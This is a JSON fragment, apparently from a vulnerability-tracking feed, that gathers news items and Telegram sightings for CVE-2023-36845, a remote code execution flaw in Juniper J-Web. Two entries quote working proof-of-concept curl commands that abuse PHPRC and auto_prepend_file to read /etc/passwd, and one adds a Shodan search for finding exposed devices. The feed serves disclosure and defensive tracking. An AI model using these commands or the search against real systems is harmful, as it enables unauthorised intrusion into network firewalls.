\u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u044d\u043a\u0440\u0430\u043d\u0430\u0445 Juniper SRX, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u0442\u044c RCE \u0432 JunOS.\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0430\u0432\u0433\u0443\u0441\u0442\u0430 Juniper \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847 \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 (CVSS 5.3), \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 J-Web \u041e\u0421 Juniper Networks Junos \u043d\u0430 \u0441\u0435\u0440\u0438\u044f\u0445 SRX \u0438 EX.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0438\u043b\u0430 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c J-Web \u0438\u043b\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u043c \u0445\u043e\u0441\u0442\u0430\u043c.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0432 JunOS \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 watchTowr Labs \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043f\u0435\u0440\u0435\u0434 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 (CVE-2023-36846) \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e PHP-\u0444\u0430\u0439\u043b\u0430 \u0432 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0441\u043e \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u043c \u0438\u043c\u0435\u043d\u0435\u043c \u0444\u0430\u0439\u043b\u0430.\n\n\u0417\u0430\u0442\u0435\u043c \u043e\u043d\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0442\u043e\u0439 \u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u0430 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 PHP, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u0432\u044b\u0448\u0435 \u0444\u0430\u0439\u043b \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0435\u0433\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0434\u0438\u0440\u0435\u043a\u0442\u0438\u0432\u044b\u00a0auto_prepend_file.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0432\u0441\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u044b \u043c\u043e\u0436\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c CVE-2023-36845, \u0447\u0442\u043e\u0431\u044b \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u0441\u0440\u0435\u0434\u044b,\u00a0PHPRC\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 PHP \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 PHP.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 watchTowr \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d\u0438\u044f, \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u0443\u044e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c PoC, \u043f\u0440\u043e\u0441\u0442\u043e\u0442\u0443 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 JunOS \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0442 \u0432 \u0441\u0435\u0442\u0438, watchTowr \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u043d\u0435\u0438\u0437\u0431\u0435\u0436\u043d\u043e\u0439 \u0448\u0438\u0440\u043e\u043a\u043e\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0448\u0435\u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c.", "creation_timestamp": "2023-08-29T17:29:05.000000Z"}, {"uuid": "fc2c169c-9397-4fc5-89fc-714883dd360b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/4329", "content": "Juniper J-Web - Remote Code Execution \ud83d\udd25 - CVE-2023-36845\n\nNearly 14,000 Juniper devices are affected, as a search on Shodan shows:\n\nDork : title:\"Juniper\" http.favicon.hash:2141724739\n\nPoc:\ncurl  -F $'auto_prepend_file=\"/etc/passwd\\n\"' -F 'PHPRC=/dev/fd/0'\n\nHere is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:\nhttps://lnkd.in/gEQrmXev\n\nFor more information:\nhttps://lnkd.in/gRP3uXTm \n\n#hacker_bano_chutiya_nhe", "creation_timestamp": "2023-09-20T12:19:33.000000Z"}, {"uuid": "8bd0d48e-e02a-4db0-a23e-a4cc7d592d2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/cibsecurity/68793", "content": "\u203c CVE-2023-36845 \u203c\n\nA PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain, important environments variables.Utilizing a crafted request an attacker is able to modify a certain PHP environment variable leading to partial loss of integrity, which may allow chaining to other vulnerabilities.This issue affects Juniper Networks Junos OS on SRX Series: * All versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-08-18T00:37:41.000000Z"}, {"uuid": "4f148b37-37cf-4863-bdcf-dc081097091d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/thehackernews/3888", "content": "Around 12,000 Juniper firewall devices exposed online are vulnerable to a recently disclosed flaw (CVE-2023-36845). This flaw enables unauthenticated code execution without file creation. \n \nRead details: https://thehackernews.com/2023/09/over-12000-juniper-firewalls-found.html", "creation_timestamp": "2023-09-19T11:35:17.000000Z"}, {"uuid": "d22b7eba-e259-4367-bbd0-da1ed9243bfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8347", "content": "GitHub - ak1t4/CVE-2023-36845: CVES\n\nhttps://github.com/ak1t4/CVE-2023-36845", "creation_timestamp": "2024-02-13T23:25:05.000000Z"}, {"uuid": "5818448f-ca8c-4964-896b-af73c6804053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/thebugbountyhunter/7782", "content": "Fileless Remote Code Execution on Juniper Firewalls - Blog - VulnCheck\n\nhttps://vulncheck.com/blog/juniper-cve-2023-36845", "creation_timestamp": "2023-09-18T22:57:04.000000Z"}, {"uuid": "bb2208a0-2b7d-4fce-80c4-89c1cb32cc5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1144", "content": "https://github.com/vulncheck-oss/cve-2023-36845-scanner\n#github", "creation_timestamp": "2023-09-19T16:05:01.000000Z"}, {"uuid": "979b5355-b7b6-4857-a91a-efbd9c683b1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10001", "content": "#tools\n#Offensive_security\n1. Tool to remotely dump secrets from the Windows registry\nhttps://github.com/jfjallid/go-secdump\n2. Script to check for the CVE-2023-36845 vulnerability\nhttps://github.com/ak1t4/CVE-2023-36845", "creation_timestamp": "2024-02-19T10:58:01.000000Z"}, {"uuid": "70589a04-26ba-4827-b8e1-ebdaaa6f6789", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8921", "content": "#exploit\n1. CVE-2023-36844, CVE-2023-36845,\nCVE-2023-36846, CVE-2023-36847:\nRCE in Juniper JunOS within SRX/EX Series products\nhttps://github.com/watchtowrlabs/juniper-rce_cve-2023-36844\n\n2. CVE-2023-41080:\nApache Tomcat FORM Authentication redirect\nhttps://github.com/shiomiyan/CVE-2023-41080\n\n3. CVE-2023-39063:\nRaidenFTPD Buffer Overflow\nhttps://github.com/AndreGNogueira/CVE-2023-39063", "creation_timestamp": "2023-08-27T15:11:36.000000Z"}, {"uuid": "57831f90-6199-4925-937c-b0d453cd872f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9053", "content": "#tools\n#Blue_Team_Techniques\n1. Vulnerability Scanner for Juniper Firewalls CVE-2023-36845\nhttps://github.com/vulncheck-oss/cve-2023-36845-scanner\n2. PS-MOTW: PowerShell scripts to set/show/remove MOTW (Mark of the Web)\nhttps://github.com/nmantani/PS-MOTW\n]-> https://github.com/nmantani/archiver-MOTW-support-comparison", "creation_timestamp": "2023-09-20T11:01:30.000000Z"}, {"uuid": "fcdfa41e-f22c-4141-9d98-786fefce96df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1027", "content": "#tools\n#Blue_Team_Techniques\n1. Vulnerability Scanner for Juniper Firewalls CVE-2023-36845\nhttps://github.com/vulncheck-oss/cve-2023-36845-scanner\n2. PS-MOTW: PowerShell scripts to set/show/remove MOTW (Mark of the Web)\nhttps://github.com/nmantani/PS-MOTW\n]-> https://github.com/nmantani/archiver-MOTW-support-comparison", "creation_timestamp": "2024-08-16T08:26:42.000000Z"}, {"uuid": "14f8d05c-dbab-4049-924f-b8a9c6e7866a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1042", "content": "https://github.com/vulncheck-oss/cve-2023-36845-scanner\n#github", "creation_timestamp": "2024-08-16T08:28:17.000000Z"}, {"uuid": "48d81c3f-363a-4544-a9aa-ea7b06589942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-30)", "content": "", "creation_timestamp": "2026-04-30T00:00:00.000000Z"}, {"uuid": "db82caae-400b-4c70-99e2-e2fff7a2f2c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/referencebooks0/7", "content": "\u2b55\ufe0fJuniper Web Device Manager - RCE\nCVE-2023-36845\n\n\ncurl \"http://xxxx:xxxx/?PHPRC=/dev/fd/0\" --data-binary 'auto_prepend_file=\"/etc/passwd\"' -X POST\n\nNuceli Template :\nhttps://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu", "creation_timestamp": "2023-10-16T13:10:58.000000Z"}, {"uuid": "3abd28cb-2316-4742-a7ce-b031358e7927", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/18bba323-4664-4b36-968b-79b2c1885ce5", "content": "", "creation_timestamp": "2026-06-19T12:46:46.275303Z"}, {"uuid": "a0747b9f-0e80-4118-88a0-918ab03f5d21", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/8a6c1aa9-e8ee-4178-af79-93dfc790b1e1", "content": "", "creation_timestamp": "2026-06-23T14:05:47.714384Z"}]}